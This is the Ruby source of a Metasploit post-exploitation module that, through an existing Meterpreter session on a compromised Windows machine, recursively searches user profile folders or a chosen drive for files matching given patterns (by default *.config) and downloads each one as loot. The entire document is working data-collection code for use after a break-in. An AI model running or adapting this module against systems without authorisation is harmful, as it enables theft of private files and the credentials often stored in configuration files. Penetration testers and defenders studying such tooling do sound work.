1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Windows::FileSystem
9
  include Msf::Post::Windows::Version
10
  include Msf::Auxiliary::Report
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Windows Gather Generic File Collection',
17
        'Description' => %q{
18
          This module downloads files recursively based on the FILE_GLOBS option.
19
        },
20
        'License' => MSF_LICENSE,
21
        'Author' => [
22
          '3vi1john <Jbabio[at]me.com>',
23
          'RageLtMan <rageltman[at]sempervictus>'
24
        ],
25
        'Platform' => [ 'win' ],
26
        'SessionTypes' => [ 'meterpreter' ],
27
        'Notes' => {
28
          'Stability' => [CRASH_SAFE],
29
          'SideEffects' => [],
30
          'Reliability' => []
31
        },
32
        'Compat' => {
33
          'Meterpreter' => {
34
            'Commands' => %w[
35
              stdapi_fs_search
36
              stdapi_railgun_api
37
              stdapi_sys_config_getenv
38
            ]
39
          }
40
        }
41
      )
42
    )
43

44
    register_options(
45
      [
46
        OptString.new('SEARCH_FROM', [ false, 'Search from a specific location. Ex. C:\\']),
47
        OptString.new('FILE_GLOBS', [ true, 'The file pattern to search for in a filename', '*.config'])
48
      ]
49
    )
50
  end
51

52
  def download_files(location, file_type)
53
    sysdriv = client.sys.config.getenv('SYSTEMDRIVE')
54
    profile_path_old = sysdriv + '\\Documents and Settings\\'
55
    profile_path_new = sysdriv + '\\Users\\'
56

57
    version = get_version_info
58
    if location
59
      print_status("Searching #{location}")
60
      getfile = client.fs.file.search(location, file_type, true, -1)
61

62
    elsif version.build_number < Msf::WindowsVersion::Vista_SP0
63
      print_status("Searching #{profile_path_old} through windows user profile structure")
64
      getfile = client.fs.file.search(profile_path_old, file_type, true, -1)
65
    else
66
      # For systems such as: Windows 7|Windows Vista|2008
67
      print_status("Searching #{profile_path_new} through windows user profile structure")
68
      getfile = client.fs.file.search(profile_path_new, file_type, true, -1)
69
    end
70

71
    getfile.each do |file|
72
      filename = "#{file['path']}\\#{file['name']}"
73
      data = read_file(filename)
74
      print_status("Downloading #{file['path']}\\#{file['name']}")
75
      p = store_loot('host.files', 'application/octet-stream', session, data, file['name'], filename)
76
      print_good("#{file['name']} saved as: #{p}")
77
    end
78
  end
79

80
  def run
81
    # When the location is set, make sure we have a valid path format
82
    location = datastore['SEARCH_FROM']
83
    if location && location !~ (%r{^([a-z]):[\\|/].*}i)
84
      print_error("Invalid SEARCH_FROM option: #{location}")
85
      return
86
    end
87

88
    # When the location option is set, make sure we have a valid drive letter
89
    my_drive = ::Regexp.last_match(1)
90
    drives = get_drives
91
    if location && !drives.include?(my_drive)
92
      print_error("#{my_drive} drive is not available, please try: #{drives.inspect}")
93
      return
94
    end
95

96
    datastore['FILE_GLOBS'].split(',').each do |glob|
97
      download_files(location, glob.strip)
98
    rescue ::Rex::Post::Meterpreter::RequestError => e
99
      if e.message =~ /The device is not ready/
100
        print_error("#{my_drive} drive is not ready")
101
        next
102
      elsif e.message =~ /The system cannot find the path specified/
103
        print_error('Path does not exist')
104
        next
105
      else
106
        raise e
107
      end
108
    end
109

110
    print_status('Done!')
111
  end
112
end
113

114